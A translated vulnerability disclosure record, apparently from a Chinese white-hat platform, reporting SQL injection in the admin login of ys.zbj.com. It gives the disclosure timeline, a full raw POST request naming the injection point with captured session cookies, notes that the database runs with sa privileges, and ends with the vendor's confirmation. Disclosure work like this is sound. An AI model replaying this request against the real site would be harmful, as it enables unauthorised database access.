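2016-04-20: Details reported to the vendor; awaiting vendor handling
2016-04-20: Vendor confirmed; details disclosed to the vendor only
2016-04-30: Details disclosed to core white hats and experts in related fields
2016-05-10: Details disclosed to regular white hats
2016-05-20: Details disclosed to intern white hats
2016-06-04: Details disclosed to the public
SQL injection on a Zhubajie (zbj.com) site (affects multiple databases)
URL:
http://ys.zbj.com/
Injection point:
http://ys.zbj.com/admin/login.aspx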
POST /admin/login.aspx HTTP/1.1
Host: ys.zbj.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://ys.zbj.com/admin/login.aspx
Cookie: _uq=18241e35bac5b8b2e8601d03d463bca4; __utma=168466538.314760027.1460619295.1461073714.1461076825.5; __utmz=168466538.1460619428.2.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; defaultShowUser=1; defaultShowService=1; _ga=GA1.2.314760027.1460619295; _analysis=b6fe8TFefXhUuvqCSEDxNOCQ0fNrIYfLoDprla6W%2BK%2B6GEzN5DJzysQEim7Ie9U%2BDlZ2FSTuSEix58aKj9q8jI8ad7YPP1IHwylQ2NQdt5zUru8BBzJJVrqHjt7zt1YywmnnuMmhG1rShMS%2FWoHSsym6wyMDt97Z%2B%2B6fOxSU9DIZYSRaDEHgBHvQnCZwRntuCxj3rh3gsJMFudgaU4rhywm%2B; fvtime=313d1rpVkRd6irLGWoo0CZ8LOrt2kZwg%2Bq6wnjl%2BIYzfqAR7Ss3f; [email protected]; intlang=cn; ASP.NET_SessionId=nl1bc3dkg55pnzhs5khe0a2o; CNZZDATA1253200665=1225147171-1461060946-%7C1461060946; CNZZDATA1257731212=1111736398-1461061164-%7C1461061164; IESESSION=alive; pgv_pvi=1889716224; pgv_si=s5064029184; tencentSig=5519374336; uniqid=6119ec21e3d4f42a5fadc546ac3173d4; __utmc=168466538
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 321

__VIEWSTATE=%2FwEPDwUJMjc1NDAxNTM4ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIY2tvbmxpbmWJXcg1GuvRBUvuJ0%2F0Y%2B9jSsxa66v5nb71LsZFF%2BwuUw%3D%3D&__EVENTVALIDATION=%2FwEWBQL2%2F9yfBwLEhISFCwKd%2B7qdDgKagKOQCgLmrOjlAZY7ghVs8K%2Bx0OUPCorFtmtC5vJP9fUmiArVgaDAbFE0&TenantId=&txtName=admin&txtPwd=admin&txtAutoCode=4083
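1: Injection
2: Database running with sa privileges
3: Affected databases
1: If you were given several sites, how could you guarantee they would have no problems?
2: What is your ideal in life? Hehe
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2016-04-20 09:00
Thanks to @catchermana for the report; the issue is real. We have started fixing it. PS: This site belongs to an investment company and does not affect user information on the main Zhubajie site. As for the fix you mentioned, we can discuss it further when we have the chance.
None yet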